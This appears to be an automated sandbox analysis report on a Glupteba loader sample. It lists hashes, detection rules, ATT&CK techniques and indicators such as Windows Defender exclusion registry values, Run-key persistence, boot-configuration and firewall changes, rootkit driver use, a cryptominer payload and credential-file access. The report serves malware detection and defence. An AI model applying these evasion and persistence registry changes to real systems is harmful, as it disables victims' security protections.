glupteba | 8ad20c4b4c312feb468a58d1748c0d7abba3dd2d0fb8e6bfbee837c47a0e8c5a

Analysis

max time kernel
1095s
max time network
1200s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28/02/2024, 13:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

288c47bbc1871b439df19ff4df68f07776.exe
Size

4.5MB
MD5

2c7078b90caee9d791dd338c2441ca32
SHA1

56901d99127fd701353ab7c68e66c94c49eb507c
SHA256

8ad20c4b4c312feb468a58d1748c0d7abba3dd2d0fb8e6bfbee837c47a0e8c5a
SHA512

000d81908bc2df1f09fcbf0ac50c72079064923f23fbea2ee0868590eaf693dff4246bb0090083aaec6f031b11353147393b710f72cd1e3630c2ecd071401ef6
SSDEEP

98304:5LGSrOpzjhc9lEoupup/jJ1hPE73PGV6F8bnYFc+x69kDP83i:kdjK9lZuEprhEjC7Y69+Pmi

Score

10^/10

glupteba xmrig discovery dropper evasion loader miner persistence rootkit spyware stealer trojan upx

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 23 IoCs

resource	yara_rule
behavioral1/memory/2260-24-0x0000000003DF0000-0x00000000046DB000-memory.dmp	family_glupteba
behavioral1/memory/2260-25-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2260-69-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2260-72-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2432-75-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2432-86-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-107-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-148-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-232-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-262-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-263-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-264-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-295-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-305-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-307-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-312-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-315-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-318-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-321-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-324-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/2896-325-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/3020-413-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba
behavioral1/memory/3020-415-0x0000000000400000-0x0000000001E0F000-memory.dmp	family_glupteba

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	288c47bbc1871b439df19ff4df68f076.exe

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral1/files/0x0006000000016cb7-406.dat	family_xmrig
behavioral1/files/0x0006000000016cb7-406.dat	xmrig
behavioral1/files/0x0006000000016cb7-404.dat	family_xmrig
behavioral1/files/0x0006000000016cb7-404.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
488	bcdedit.exe
2032	bcdedit.exe
932	bcdedit.exe
2220	bcdedit.exe
2248	bcdedit.exe
2324	bcdedit.exe
636	bcdedit.exe
912	bcdedit.exe
2200	bcdedit.exe
2008	bcdedit.exe
2904	bcdedit.exe
1476	bcdedit.exe
1548	bcdedit.exe
888	bcdedit.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1644	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Executes dropped EXE 16 IoCs

pid	Process
1840	InstallSetup_four.exe
2260	288c47bbc1871b439df19ff4df68f076.exe
2656	u1f4.0.exe
2208	u1f4.1.exe
2432	288c47bbc1871b439df19ff4df68f076.exe
2896	csrss.exe
1544	patch.exe
1272	injector.exe
1536	dsefix.exe
2128	windefender.exe
1368	windefender.exe
2036	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
2132	713674d5e968cbe2102394be0b2bae6f.exe
2960	1bf850b4d9587c1017a75a47680584c4.exe
2108	wup.exe
3020	csrss.exe

Loads dropped DLL 35 IoCs

pid	Process
2140	288c47bbc1871b439df19ff4df68f07776.exe
2140	288c47bbc1871b439df19ff4df68f07776.exe
2140	288c47bbc1871b439df19ff4df68f07776.exe
1840	InstallSetup_four.exe
1840	InstallSetup_four.exe
1840	InstallSetup_four.exe
1840	InstallSetup_four.exe
1840	InstallSetup_four.exe
1840	InstallSetup_four.exe
1840	InstallSetup_four.exe
1840	InstallSetup_four.exe
1840	InstallSetup_four.exe
2432	288c47bbc1871b439df19ff4df68f076.exe
2432	288c47bbc1871b439df19ff4df68f076.exe
852	Process not Found
1544	patch.exe
1544	patch.exe
1544	patch.exe
1544	patch.exe
1544	patch.exe
2896	csrss.exe
2656	u1f4.0.exe
2656	u1f4.0.exe
1544	patch.exe
1544	patch.exe
1544	patch.exe
2896	csrss.exe
2896	csrss.exe
2896	csrss.exe
2896	csrss.exe
2896	csrss.exe
2896	csrss.exe
2896	csrss.exe
2036	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
2036	dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 29 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000014e51-50.dat	upx
behavioral1/files/0x0006000000014e51-64.dat	upx
behavioral1/memory/2208-67-0x0000000000400000-0x0000000000930000-memory.dmp	upx
behavioral1/memory/2208-101-0x0000000000400000-0x0000000000930000-memory.dmp	upx
behavioral1/memory/2208-145-0x0000000000400000-0x0000000000930000-memory.dmp	upx
behavioral1/files/0x0005000000004ed7-300.dat	upx
behavioral1/memory/2128-301-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2128-304-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1368-308-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1368-313-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/files/0x0009000000016843-368.dat	upx
behavioral1/files/0x0009000000016843-371.dat	upx
behavioral1/files/0x0009000000016843-374.dat	upx
behavioral1/memory/2896-375-0x000000002E850000-0x000000002ED31000-memory.dmp	upx
behavioral1/files/0x0009000000016843-376.dat	upx
behavioral1/memory/2036-378-0x0000000000400000-0x00000000008E1000-memory.dmp	upx
behavioral1/files/0x0006000000016a9a-386.dat	upx
behavioral1/files/0x0006000000016a9a-385.dat	upx
behavioral1/files/0x0006000000016a9a-382.dat	upx
behavioral1/files/0x0006000000016a9a-380.dat	upx
behavioral1/memory/2132-391-0x0000000000350000-0x0000000000C1D000-memory.dmp	upx
behavioral1/files/0x0006000000016c63-399.dat	upx
behavioral1/files/0x0006000000016c63-396.dat	upx
behavioral1/files/0x0006000000016c63-393.dat	upx
behavioral1/files/0x0006000000016c63-400.dat	upx
behavioral1/memory/2960-402-0x0000000000400000-0x00000000008E8000-memory.dmp	upx
behavioral1/memory/2036-426-0x0000000000400000-0x00000000008E1000-memory.dmp	upx
behavioral1/memory/2132-427-0x0000000000350000-0x0000000000C1D000-memory.dmp	upx
behavioral1/memory/2960-443-0x0000000000400000-0x00000000008E8000-memory.dmp	upx

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0"	288c47bbc1871b439df19ff4df68f076.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5858	ip-api.com
8615	ip-api.com
10513	ip-api.com

Manipulates WinMon driver. 2 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	288c47bbc1871b439df19ff4df68f076.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	288c47bbc1871b439df19ff4df68f076.exe
File created	C:\Windows\rss\csrss.exe	288c47bbc1871b439df19ff4df68f076.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240228133126.cab	makecab.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2296	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u1f4.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u1f4.0.exe

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2540	schtasks.exe
2796	schtasks.exe
904	schtasks.exe
2940	schtasks.exe
1292	schtasks.exe
1392	schtasks.exe

GoLang User-Agent 16 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	3646	Go-http-client/1.1
HTTP User-Agent header	3647	Go-http-client/1.1
HTTP User-Agent header	8283	Go-http-client/1.1
HTTP User-Agent header	12035	Go-http-client/1.1
HTTP User-Agent header	3577	Go-http-client/1.1
HTTP User-Agent header	59	Go-http-client/1.1
HTTP User-Agent header	6771	Go-http-client/1.1
HTTP User-Agent header	12849	Go-http-client/1.1
HTTP User-Agent header	48	Go-http-client/1.1
HTTP User-Agent header	12039	Go-http-client/1.1
HTTP User-Agent header	13508	Go-http-client/1.1
HTTP User-Agent header	45	Go-http-client/1.1
HTTP User-Agent header	6837	Go-http-client/1.1
HTTP User-Agent header	12379	Go-http-client/1.1
HTTP User-Agent header	13494	Go-http-client/1.1
HTTP User-Agent header	3579	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-491 = "India Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-352 = "FLE Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-521 = "N. Central Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time"	windefender.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
